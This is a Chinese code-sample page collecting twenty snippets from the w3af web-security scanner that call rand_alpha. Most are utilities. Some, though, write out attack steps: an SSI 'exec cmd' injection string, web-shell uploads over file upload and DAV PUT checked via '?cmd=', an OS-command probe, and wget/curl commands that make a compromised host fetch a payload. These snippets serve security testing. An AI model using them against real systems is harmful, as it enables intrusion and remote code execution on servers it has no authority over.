
Python utils.rand_alpha函数代码示例


本文整理汇总了Python中w3af.core.data.fuzzer.utils.rand_alpha函数的典型用法代码示例。如果您正苦于以下问题:Python rand_alpha函数的具体用法?Python rand_alpha怎么用?Python rand_alpha使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。



在下文中一共展示了rand_alpha函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。

示例1: _get_ssi_strings

    def _get_ssi_strings(self):
        """
        Generate the server side include (SSI) test string for this plugin.

        The directive asks the server to echo two independent 5 char random
        tokens, which makes the string different on every call.

        :yield: One string holding an SSI "exec" directive.
        """
        first_token = rand_alpha(5)
        second_token = rand_alpha(5)
        yield '<!--#exec cmd="echo -n %s;echo -n %s" -->' % (first_token,
                                                             second_token)
开发者ID:masterapocalyptic,项目名称:Tortazo-spanishtranslate,代码行数:7,代码来源:ssi.py


示例2: _get_table_prefix

    def _get_table_prefix(self, table_prefix):
        """
        Build the table prefix for a cached disk dict.

        :param table_prefix: Optional caller supplied prefix, None to use only
                             the random suffix.
        :return: 'cached_disk_dict_' followed by the optional prefix and a 16
                 char random suffix.
        """
        if table_prefix is not None:
            return 'cached_disk_dict_%s_%s' % (table_prefix, rand_alpha(16))

        return 'cached_disk_dict_%s' % rand_alpha(16)
开发者ID:andresriancho,项目名称:w3af,代码行数:8,代码来源:cached_disk_dict.py


示例3: _get_web_shells

    def _get_web_shells(self, extension):
        """
        Build the content / file name pairs used to test a file upload.

        :param extension: The extension that the upload URL had.
        :yield: Tuples with file_content and file_name for web shells.
        """
        for shell_str, orig_extension in shell_handler.get_webshells(extension):
            # Each shell is offered twice, every time with a fresh 8 char
            # random name: first with the extension the shell was written for
            # (webshell.php becomes something like kgiwjxh.php) and then with
            # the extension that the upload URL had.
            for candidate_extension in (orig_extension, extension):
                yield shell_str, '%s.%s' % (rand_alpha(8), candidate_extension)
开发者ID:ElAleyo,项目名称:w3af,代码行数:15,代码来源:file_upload.py


示例4: audit

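    def audit(self, freq, orig_response):
        """
        Searches for file upload vulns using a POST to author.dll.

        Each domain path is tested at most once, and no request is sent when a
        'frontpage' finding is already stored in the knowledge base.

        :param freq: A FuzzableRequest
        :param orig_response: Not used by this method.
        """
        domain_path = freq.get_url().get_domain_path()

        if kb.kb.get(self, 'frontpage'):
            # Nothing to do, I have found vuln(s) and I should stop on first
            msg = 'Not verifying if I can upload files to: "%s" using'\
                  ' author.dll. Because I already found a vulnerability.'
            # The template has a "%s" placeholder, fill it with the path so
            # the debug log doesn't show a literal %s
            om.out.debug(msg % domain_path)
            return

        # I haven't found any vulns yet, OR i'm trying to find every
        # directory where I can write a file.
        if domain_path in self._already_tested:
            return

        self._already_tested.add(domain_path)

        # Find a file that doesn't exist and then try to upload it. Using a
        # name which returns 404 makes sure that no existing resource of the
        # target is overwritten by the test.
        for _ in xrange(3):
            rand_file = rand_alpha(5) + '.html'
            rand_path_file = domain_path.url_join(rand_file)
            res = self._uri_opener.GET(rand_path_file)
            if is_404(res):
                upload_id = self._upload_file(domain_path, rand_file)
                self._verify_upload(domain_path, rand_file, upload_id)
                break
        else:
            # All three random names answered with something that is_404()
            # didn't recognize as "not found"
            msg = 'frontpage plugin failed to find a 404 page. This is'\
                  ' mostly because of an error in 404 page detection.'
            om.out.error(msg)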
开发者ID:3rdDegree,项目名称:w3af,代码行数:33,代码来源:frontpage.py


示例5: transfer

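    def transfer(self, data_str, destination):
        """
        This method is used to transfer the data_str from w3af to the compromised server.

        The data is written to a randomly named file in the temp directory, a
        local web server is started and the remote host is told to download
        the file with the tool stored in self._command (wget, lynx or curl).

        :param data_str: The content to transfer.
        :param destination: The path where the remote host stores the download.
        :return: The result of self.verify_upload(data_str, destination).
        """
        if not self._command:
            self.can_transfer()

        command_templates = {
            'wget': 'wget http://%s:%s/%s -O %s',
            'lynx': 'lynx -source http://%s:%s/%s > %s',
            'curl': 'curl http://%s:%s/%s > %s',
        }

        # Create the file, the context manager closes the handle even when
        # the write fails
        filename = rand_alpha(10)
        file_path = os.path.join(get_temp_dir(), filename)
        with open(file_path, 'w') as temp_file:
            temp_file.write(data_str)

        try:
            local_ip = cf.cf.get('local_ip_address')

            # Start a web server on the inbound port and create the file that
            # will be fetched by the compromised host
            #
            # NOTE(review): the third argument is presumably the document
            # root, if so every file in the temp directory can be requested
            # on the inbound port while the server runs - confirm, and keep
            # that directory free of anything which shouldn't be shared.
            webserver.start_webserver(local_ip,
                                      self._inbound_port,
                                      get_temp_dir())

            command_to_run = command_templates[self._command] % \
                (local_ip, self._inbound_port, filename, destination)
            self._exec_method(command_to_run)
        finally:
            # Don't leave the payload in the temp directory when the web
            # server or the remote command fails
            os.remove(file_path)

        return self.verify_upload(data_str, destination)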
开发者ID:Daisymei,项目名称:w3af,代码行数:33,代码来源:clientless_reverse_http.py


示例6: __init__

    def __init__(self, table_prefix=None, dump=None, load=None):
        """
        Create the backing table and index for this disk list in the default
        temp DB.

        :param table_prefix: The DBMS table prefix, mostly for debugging.
        :param dump: The function to use to serialize the object
        :param load: The function to use to deserialize the object
        """
        self.db = get_default_temp_db_instance()

        # The 30 char random suffix gives every instance its own table.
        # NOTE(review): table_prefix ends up in a table identifier, presumably
        # callers only pass constants - confirm.
        if table_prefix is None:
            self.table_name = 'disk_list_' + rand_alpha(30)
        else:
            self.table_name = 'disk_list_%s_' % table_prefix + rand_alpha(30)

        # NOTE(review): the BLOB column below is named "pickle"; if load
        # unpickles its content the temp DB must only be writable by the user
        # running the scan, since unpickling untrusted data runs code - confirm.
        self.dump = dump
        self.load = load

        # Create table
        # DO NOT add the AUTOINCREMENT flag to the table creation since that
        # will break __getitem__ when an item is removed, see:
        #     http://www.sqlite.org/faq.html#q1
        primary_keys = ['index_']
        table_columns = [
            ('index_', 'INTEGER'),
            ('eq_attrs', 'TEXT'),
            ('pickle', 'BLOB'),
        ]

        self.db.create_table(self.table_name, table_columns, primary_keys)
        self.db.create_index(self.table_name, ['eq_attrs'])
        self.db.commit()

        self._state = OPEN
开发者ID:andresriancho,项目名称:w3af,代码行数:28,代码来源:disk_list.py


示例7: setup

    def setup(self):
        """
        Create the backend stores used by the knowledge base.

        This lives outside __init__() to avoid starting any threads during
        python's import phase, which dead-locks in some cases.

        The work is done while holding self._kb_lock and only by the first
        call, later calls return as soon as self.initialized is seen.

        :return: None
        """
        with self._kb_lock:
            if self.initialized:
                return

            self.urls = DiskSet(table_prefix='kb_urls')
            self.fuzzable_requests = DiskSet(table_prefix='kb_fuzzable_requests')

            self.db = get_default_persistent_db_instance()
            self.table_name = 'knowledge_base_%s' % rand_alpha(30)

            self.db.create_table(self.table_name, self.COLUMNS)
            for indexed_columns in (['location_a', 'location_b'], ['uniq_id']):
                self.db.create_index(self.table_name, indexed_columns)
            self.db.commit()

            # Only initialize once
            self.initialized = True
开发者ID:0x554simon,项目名称:w3af,代码行数:25,代码来源:knowledge_base.py


示例8: create_mutants

    def create_mutants(freq, mutant_str_list, fuzzable_param_list,
                       append, fuzzer_config):
        """
        Create the mutants which replace the content of uploaded files.

        Usually called from fuzzer.py module. An empty list is returned when
        'fuzz_form_files' is not in fuzzer_config, when freq is not an
        HTTPPostDataRequest or when the request has no file variables.

        :return: The mutants created by Mutant._create_mutants_worker.
        """
        if 'fuzz_form_files' not in fuzzer_config:
            return []

        if not isinstance(freq, HTTPPostDataRequest):
            return []

        file_vars = freq.get_file_vars()
        if not file_vars:
            return []

        ext = fuzzer_config['fuzzed_files_extension']

        # Only string payloads become files. Each one gets a NamedStringIO
        # with a random "name", which is needed for MultipartPostHandler
        fake_file_objs = [
            NamedStringIO(payload, name="%s.%s" % (rand_alpha(7), ext))
            for payload in mutant_str_list
            if isinstance(payload, basestring)
        ]

        return Mutant._create_mutants_worker(freq, FileContentMutant,
                                             fake_file_objs,
                                             file_vars,
                                             append, fuzzer_config)
开发者ID:3rdDegree,项目名称:w3af,代码行数:32,代码来源:filecontent_mutant.py


示例9: audit

    def audit(self, freq, orig_response, debugging_id):
        """
        Searches for file upload vulns using a POST to author.dll.

        :param freq: A FuzzableRequest
        :param orig_response: The HTTP response associated with the fuzzable request
        :param debugging_id: A unique identifier for this call to audit()
        """
        # Run only when the author URL for this frontpage instance is known
        # and no vulnerability of this type was identified yet
        if self._get_author_url() is None or kb.kb.get(self, 'frontpage'):
            return

        domain_path = freq.get_url().get_domain_path()

        # Upload only once to each directory
        if domain_path in self._already_tested:
            return

        self._already_tested.add(domain_path)

        # A 6 char random name for the test page
        test_file_name = '%s.html' % rand_alpha(6)
        upload_id = self._upload_file(domain_path, test_file_name,
                                      debugging_id)
        self._verify_upload(domain_path, test_file_name, upload_id,
                            debugging_id)
开发者ID:foobarmonk,项目名称:w3af,代码行数:27,代码来源:frontpage.py


示例10: _PUT

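    def _PUT(self, domain_path):
        """
        Tests PUT method.

        A randomly named resource with random content is sent with PUT under
        domain_path and then requested with GET. When the GET body matches
        the content a vulnerability is stored in the knowledge base; 500 and
        403 answers to the PUT are stored as informational findings.

        The uploaded test file is not removed by this method. Its URL is
        part of the finding, which allows cleaning it up after the scan.

        :param domain_path: The URL of the directory to test.
        """
        # upload
        url = domain_path.url_join(rand_alpha(5))
        rnd_content = rand_alnum(6)
        headers = Headers([('content-type', 'text/plain')])

        put_response = self._uri_opener.PUT(url, data=rnd_content,
                                            headers=headers)

        # check if uploaded
        res = self._uri_opener.GET(url, cache=True)
        if res.get_body() == rnd_content:
            msg = 'File upload with HTTP PUT method was found at resource:' \
                  ' "%s". A test file was uploaded to: "%s".'
            msg = msg % (domain_path, res.get_url())

            v = Vuln('Insecure DAV configuration', msg, severity.HIGH,
                     [put_response.id, res.id], self.get_name())

            v.set_url(url)
            v.set_method('PUT')

            self.kb_append(self, 'dav', v)

        # Report some common errors
        elif put_response.get_code() == 500:
            msg = 'DAV seems to be incorrectly configured. The web server' \
                  ' answered with a 500 error code. In most cases, this means'\
                  ' that the DAV extension failed in some way. This error was'\
                  ' found at: "%s".' % put_response.get_url()

            # The 500 was the answer to the PUT, so the PUT response has to
            # be part of the evidence, like in the other two findings
            i = Info('DAV incorrect configuration', msg,
                     [put_response.id, res.id], self.get_name())

            i.set_url(url)
            i.set_method('PUT')

            self.kb_append(self, 'dav', i)

        # Report some common errors
        elif put_response.get_code() == 403:
            msg = 'DAV seems to be correctly configured and allowing you to'\
                  ' use the PUT method but the directory does not have the'\
                  ' correct permissions that would allow the web server to'\
                  ' write to it. This error was found at: "%s".'
            msg = msg % put_response.get_url()

            i = Info('DAV incorrect configuration', msg,
                     [put_response.id, res.id], self.get_name())

            i.set_url(url)
            i.set_method('PUT')

            self.kb_append(self, 'dav', i)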
开发者ID:ElAleyo,项目名称:w3af,代码行数:56,代码来源:dav.py


示例11: can_exploit

 def can_exploit(self, opener):
     """
     Check if commands are executed by sending an echo with a random token.

     The 8 char token is piped through rev, a response holding the reversed
     token can only come from a host which really ran the command.

     :param opener: Passed to self.send() together with the command.
     :return: True when the extracted result is the reversed token followed
              by a new line.
     """
     token = rand_alpha(8)
     probe = self.generate_command('echo %s|rev' % token)

     # rev adds a \n to the string it reverses, even when the echo is run
     # with "-n", so the new line is part of what we expect.
     reversed_token = token[::-1]
     expected_output = '%s\n' % reversed_token

     response = self.send(probe, opener)
     return expected_output == self.extract_result(response)
开发者ID:3rdDegree,项目名称:w3af,代码行数:10,代码来源:os_commanding.py


示例12: get_file_from_template

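def get_file_from_template(extension):
    """
    Return the content of the template for extension and a random file name.

    :param extension: The file extension, without the leading dot.
    :return: A tuple with (success, file_content, file_name). success is True
             when template.<extension> exists in TEMPLATE_DIR, when it doesn't
             file_content is the result of rand_alnum(64).
    """
    file_name = "%s.%s" % (rand_alpha(7), extension)

    # NOTE(review): extension becomes part of a file system path, presumably
    # callers pass a plain extension without path separators - confirm.
    template_file = os.path.join(TEMPLATE_DIR, 'template.%s' % extension)
    if os.path.exists(template_file):
        # The context manager closes the handle, file(...).read() left that
        # to the garbage collector
        with open(template_file) as template_fh:
            file_content = template_fh.read()
        success = True
    else:
        file_content = rand_alnum(64)
        success = False

    return success, file_content, file_name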
开发者ID:3rdDegree,项目名称:w3af,代码行数:12,代码来源:file_templates.py


示例13: __init__

    def __init__(self):
        """
        Set the random token and the default configuration of the plugin.
        """
        AuditPlugin.__init__(self)

        # Random lower case token for fuzz_with_echo; the expected result is
        # the token repeated PRINT_REPEATS times.
        self._rnd = rand_alpha(5).lower()
        self._expected_result = self._rnd * self.PRINT_REPEATS

        # User configured parameters
        self._use_echo = True
        self._use_time_delay = True
开发者ID:3rdDegree,项目名称:w3af,代码行数:12,代码来源:eval.py


示例14: _fingerprint_SecureIIS

 def _fingerprint_SecureIIS(self, fuzzable_request):
     """
     Try to verify if SecureIIS is installed or not.

     Sends a GET whose Transfer-Encoding header holds 1025 random chars. In
     the lines shown here the response is stored but not inspected, only a
     failed request is written to the debug log.

     :param fuzzable_request: The request which provides the URL and headers.
     """
     # NOTE(review): if get_headers() returns the headers object of the
     # request and not a copy, the assignment below changes the request
     # itself - confirm.
     probe_headers = fuzzable_request.get_headers()
     probe_headers['Transfer-Encoding'] = rand_alpha(1024 + 1)

     try:
         lock_response2 = self._uri_opener.GET(fuzzable_request.get_url(),
                                               headers=probe_headers,
                                               cache=True)
     except BaseFrameworkException as w3:
         failure = 'Failed to identify secure IIS, exception: ' + str(w3)
         om.out.debug(failure)
开发者ID:0x554simon,项目名称:w3af,代码行数:13,代码来源:fingerprint_WAF.py


示例15: _fingerprint_URLScan

    def _fingerprint_URLScan(self, fuzzable_request):
        """
        Try to verify if URLScan is installed or not.

        When the original URL doesn't answer with 404, the request is
        repeated four times, each time with a random value in one of the If,
        Translate, Lock-Token and Transfer-Encoding headers. A 404 for any of
        them is reported as URLScan.

        :param fuzzable_request: The request which provides the URL and headers.
        """
        # detect using GET
        # Get the original response
        orig_response = self._uri_opener.GET(
            fuzzable_request.get_url(), cache=True)
        if orig_response.get_code() == 404:
            return

        probe_responses = []
        for header_name in ('If', 'Translate', 'Lock-Token',
                            'Transfer-Encoding'):
            # NOTE(review): the headers are requested again for each probe,
            # but if get_headers() returns the same object every time the
            # random values of the previous probes are sent too - confirm.
            headers = fuzzable_request.get_headers()
            headers[header_name] = rand_alpha(8)
            probe_responses.append(
                self._uri_opener.GET(fuzzable_request.get_url(),
                                     headers=headers,
                                     cache=True))

        if any(probe.get_code() == 404 for probe in probe_responses):
            # The finding is always reported with the Lock-Token response,
            # the third probe
            lock_response = probe_responses[2]
            self._report_finding('URLScan', lock_response)
开发者ID:0x554simon,项目名称:w3af,代码行数:38,代码来源:fingerprint_WAF.py


示例16: _verify_vuln

    def _verify_vuln(self, vuln_obj):
        """
        Verify that the vulnerability can be exploited.

        The candidates from shell_handler.get_webshells() are uploaded one by
        one with PUT and requested with an empty command, until a response
        contains shell_handler.SHELL_IDENTIFIER. The first attempt uses the
        extension of the vulnerable URL when it has one, later attempts use
        the extension which comes with each candidate.

        Files written by failed attempts are not removed by this method.

        :param vuln_obj: The vulnerability to verify.
        :return : True if vuln can be exploited. When no candidate answers
                  with the identifier the method ends without a return
                  statement, which gives None.
        """
        # One random base name is shared by all the attempts
        base_name = rand_alpha(7)
        extension = vuln_obj.get_url().get_extension()

        # Tuples with file_content and the extension to use
        candidates = shell_handler.get_webshells(extension)

        for file_content, real_extension in candidates:
            if extension == '':
                extension = real_extension
            om.out.debug('Uploading shell with extension: "%s".' % extension)

            # Upload the shell
            fname = '%s.%s' % (base_name, extension)
            url_to_upload = vuln_obj.get_url().url_join(fname)

            om.out.debug(
                'Uploading file %s using PUT method.' % url_to_upload)
            self._uri_opener.PUT(url_to_upload, data=file_content)

            # All w3af shells, when invoked with a blank command, return a
            # specific value in the response:
            # shell_handler.SHELL_IDENTIFIER
            exploit_url = URL(url_to_upload + '?cmd=')
            response = self._uri_opener.GET(exploit_url)

            if shell_handler.SHELL_IDENTIFIER not in response.get_body():
                msg = 'The uploaded shell with extension: "%s" did NOT return'\
                      ' the SHELL_IDENTIFIER, which means that the file was'\
                      ' not uploaded to the remote server or the code is not'\
                      ' being run. The returned body was: "%s".'
                om.out.debug(msg % (extension, response.get_body()))

                # An empty extension makes the next iteration use the
                # extension of its own candidate
                extension = ''
                continue

            msg = 'The uploaded shell returned the SHELL_IDENTIFIER, which'\
                  ' verifies that the file was uploaded and is being' \
                  ' executed.'
            om.out.debug(msg)
            self._exploit_url = exploit_url
            return True
开发者ID:andresriancho,项目名称:w3af-kali,代码行数:47,代码来源:dav.py


示例17: __init__

    def __init__(self):
        """
        Create the backing table and index for this disk list in the default
        temp DB. The table name is 30 random chars.
        """
        self.db = get_default_temp_db_instance()
        self.table_name = rand_alpha(30)

        # Create table
        # DO NOT add the AUTOINCREMENT flag to the table creation since that
        # will break __getitem__ when an item is removed, see:
        #     http://www.sqlite.org/faq.html#q1
        primary_keys = ['index_']
        table_columns = [
            ('index_', 'INTEGER'),
            ('eq_attrs', 'TEXT'),
            ('pickle', 'BLOB'),
        ]

        self.db.create_table(self.table_name, table_columns, primary_keys)
        self.db.create_index(self.table_name, ['eq_attrs'])
        self.db.commit()
开发者ID:Adastra-thw,项目名称:Tortazo,代码行数:17,代码来源:disk_list.py


示例18: __init__

    def __init__(self, table_prefix=None):
        """
        Create the backing table and index for this disk dict in the default
        temp DB.

        :param table_prefix: Optional text added to the table name, between
                             'disk_dict_' and the 30 char random suffix.
        """
        self.db = get_default_temp_db_instance()

        # NOTE(review): table_prefix ends up in a table identifier, presumably
        # callers only pass constants - confirm.
        if table_prefix is None:
            self.table_name = 'disk_dict_' + rand_alpha(30)
        else:
            self.table_name = 'disk_dict_%s_' % table_prefix + rand_alpha(30)

        # Create table
        # DO NOT add the AUTOINCREMENT flag to the table creation since that
        # will break __getitem__ when an item is removed, see:
        #     http://www.sqlite.org/faq.html#q1
        primary_keys = ['index_']
        table_columns = [
            ('index_', 'INTEGER'),
            ('key', 'BLOB'),
            ('value', 'BLOB'),
        ]

        self.db.create_table(self.table_name, table_columns, primary_keys)
        self.db.create_index(self.table_name, ['key'])
        self.db.commit()
开发者ID:0x554simon,项目名称:w3af,代码行数:18,代码来源:disk_dict.py


示例19: validate

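    def validate(self, value):
        """
        Validate that value can be used as the path of an output file.

        "~" is expanded and "$rnd$" is replaced with 5 random chars before
        the checks are run.

        The checks describe the file system at validation time only, the code
        which opens the file later still has to handle errors.

        :param value: The path configured by the user.
        :return: The expanded path.
        :raise BaseFrameworkException: When the value is empty or a directory,
                                       when its directory doesn't exist or is
                                       not writable, or when the file exists
                                       and is not writable.
        """
        expanded_path = os.path.expanduser(value)

        # This is useful for testing, the user specifies a script with $rnd$ in the
        # output file name, w3af will replace that string with 5 random chars.
        #
        # The user can then run the same script over and over without caring about
        # overwriting his output files.
        rnd = rand_alpha(5)
        value = expanded_path = expanded_path.replace('$rnd$', rnd)

        # Please note the following:
        #     >>> os.path.abspath(os.path.dirname(''))
        #     '/home/foobar/workspace/threading2'
        #
        # An empty value would be checked against the current directory, so
        # it is rejected before any other check. This way the error is always
        # about the empty value and never about the permissions of a
        # directory which the user didn't name.
        if value == '':
            msg = 'Invalid file option, you have to specify a non-empty value.'
            raise BaseFrameworkException(msg)

        directory = os.path.abspath(os.path.dirname(expanded_path))

        if os.path.isdir(expanded_path):
            msg = 'Invalid output file "%s", it must not be a directory.'
            raise BaseFrameworkException(msg % value)

        if not os.path.isdir(directory):
            msg = ('Invalid file option "%s", the directory "%s" does'
                   ' not exist.')
            raise BaseFrameworkException(msg % (value, directory))

        if not os.access(directory, os.W_OK):
            msg = ('Invalid file option "%s", the user does not have'
                   ' enough permissions to write to the specified directory.')
            raise BaseFrameworkException(msg % value)

        if os.path.exists(value) and not os.access(value, os.W_OK):
            msg = ('Invalid file option "%s", the user does not have'
                   ' enough permissions to write to the file.')
            raise BaseFrameworkException(msg % value)

        return value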
开发者ID:andresriancho,项目名称:w3af,代码行数:44,代码来源:output_file_option.py


示例20: _check_existance

    def _check_existance(self, original_response, mutant):
        """
        Actually check if the mutated URL exists.

        The response for the mutant has to pass is_404() and the
        relative_distance_lt() comparison with the original response. It is
        then compared with the response for a random value, which filters
        applications that answer in the same way to any value.

        :param original_response: The response for the request without changes.
        :param mutant: The mutant to send.
        :return: None, all important data is put() to self.output_queue
        """
        response = self._uri_opener.send_mutant(mutant)

        if is_404(response):
            return

        if not relative_distance_lt(original_response.body, response.body,
                                    0.85):
            return

        # Verify against something random
        random_value = rand_alpha()
        control_mutant = mutant.copy()
        control_mutant.set_mod_value(random_value)
        control_response = self._uri_opener.send_mutant(control_mutant)

        if not relative_distance_lt(response.body, control_response.body,
                                    0.85):
            return

        for fr in self._create_fuzzable_requests(response):
            self.output_queue.put(fr)
开发者ID:masterapocalyptic,项目名称:Tortazo-spanishtranslate,代码行数:20,代码来源:wordnet.py



注:本文中的w3af.core.data.fuzzer.utils.rand_alpha函数示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。

